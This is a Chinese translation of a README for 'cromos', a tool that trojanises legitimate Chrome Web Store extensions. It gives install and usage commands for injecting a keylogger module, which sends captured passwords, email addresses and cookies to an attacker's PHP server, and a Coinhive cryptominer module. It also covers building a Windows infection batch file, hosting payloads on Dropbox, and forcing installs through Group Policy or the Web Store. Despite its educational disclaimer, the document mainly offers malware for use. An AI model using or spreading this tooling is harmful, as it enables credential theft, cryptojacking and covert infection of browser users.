【译】Cromos – 下载并注入代码到谷歌 Chrome 浏览器扩展中
【译】Cromos – 下载并注入代码到谷歌 Chrome 浏览器扩展中
cromos是一个用于下载Chrome网页商店合法扩展的工具,还可以在应用程序背景下注入代码。并且举例而言,cromos通过PowerShell创建可执行文件强制安装,并到云端更新文件来主持恶意文件。
- 下载扩展
- 注入
- 更新云端上的文件
- Windows感染
安装
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py使用说明
下载扩展
Usage: python cromos.py --extension {id}
下载扩展并载入模块
Usage: python cromos.py --extension {id} --load {currency/keylogger}
创建批处理文件并更新云端文件
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}
模块
你也可以在后台注入一些预定义模块,例如键盘侧录(keylogger), 虚拟货币(virtual currency)。
模块
描述
模块/键盘侧录(keylogger)
在一个受感染的浏览器中,这个模块将捕获你输入的所有密码,不管是否基于 https 协议,你所需要的只是一个php服务器,用于接收请求的参数,即电子邮件地址,密码,浏览器缓存(cookies)和用户代理程式识别码(userAgent)。
模块/货币(currency)
这个模块允许使用coinhive API挖掘虚拟金币,你只需要一个帐户。
组策略对象(GPO)
Chrome允许你添加扩展使用Windows组策略对象(GPO)。如果你需要在多台机器上强制安装,只需要按照Chrome部署向导中的步骤,然后稍微修改原来的扩展,你就可以在Chrome网页商店发布你的扩展,这需要支付5美元。
免责声明
代码示例是基于教育目的提供的。只有调查研究恶意行为者的攻击技术,我们才能构建足够的防御。未经许可,对目标系统使用这段代码在大多数地区是非法的。对滥用这段信息和代码造成的损失,作者不承担任何赔偿责任。